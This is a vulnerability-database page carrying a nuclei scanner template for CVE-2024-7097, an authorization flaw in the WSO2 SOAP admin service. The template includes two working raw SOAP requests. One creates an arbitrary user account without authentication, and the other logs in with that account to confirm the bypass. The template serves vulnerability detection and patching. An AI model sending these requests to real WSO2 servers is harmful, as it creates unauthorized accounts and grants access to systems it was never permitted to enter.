Lucene search
K

WSO2 User Registration - Arbitrary Account Creation

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 272 Views

WSO2 vulnerability allows arbitrary user account creation bypassing registration settings.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-7097
15 Jan 202512:42
circl
CNNVD
WSO2多款产品 安全漏洞
30 May 202500:00
cnnvd
CVE
CVE-2024-7097
30 May 202515:04
cve
Cvelist
CVE-2024-7097 Incorrect Authorization in Multiple WSO2 Products via SOAP Admin Service Allowing Unauthorized User Signup
30 May 202515:04
cvelist
EUVD
EUVD-2025-16505
3 Oct 202520:07
euvd
NVD
CVE-2024-7097
30 May 202515:15
nvd
Positive Technologies
PT-2025-3690
14 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2024-7097
1 Jun 202515:36
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-7097
2 Feb 202500:00
vulncheck_kev
Vulnrichment
CVE-2024-7097 Incorrect Authorization in Multiple WSO2 Products via SOAP Admin Service Allowing Unauthorized User Signup
30 May 202515:04
vulnrichment
Rows per page
id: CVE-2024-7097

info:
  name: WSO2 User Registration - Arbitrary Account Creation
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
  impact: |
    Unauthenticated attackers can bypass self-registration restrictions to create arbitrary user accounts, potentially gaining unauthorized access to the WSO2 system and its resources.
  remediation: |
    Apply security patches from WSO2 as outlined in security advisory WSO2-2024-3574 to address the arbitrary account creation vulnerability.
  reference:
    - https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
  classification:
    epss-score: 0.0054
    epss-percentile: 0.41271
  metadata:
    verified: true
    max-request: 2
    shodan-query: "WSO2 Carbon Server"
  tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev,vuln

variables:
  username: "{{randstr_1}}"
  password: "{{randstr_2}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "urn:addUser"
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
        xmlns:xsd="http://org.apache.axis2/xsd">
           <soapenv:Header/>
           <soapenv:Body>
              <xsd:addUser>
        <xsd:user>
                 <xsd:userName>{{username}}</xsd:userName>
                 <xsd:password>{{password}}</xsd:password>
        </xsd:user>
              </xsd:addUser>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: status
        status:
          - 202
        internal: true

  - raw:
      - |
        POST /services/AuthenticationAdmin HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:aut="http://authentication.services.core.carbon.wso2.org">
           <soapenv:Header/>
           <soapenv:Body>
              <aut:login>
                 <aut:username>{{username}}</aut:username>
                 <aut:password>{{password}}</aut:password>
              </aut:login>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: word
        words:
          - "loginResponse"
          - "<ns:return>true</ns:return>"
        condition: and
# digest: 490a0046304402204d5861a8a3df58260d4e1abaf5f8c371e4446d8892c521c43b331ae803c7e078022007a1e3c92394eb6243bc2f069686bf1d9857c0c22fc8ff534d029836fd2b60f1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.14.3
EPSS0.0054
SSVC
272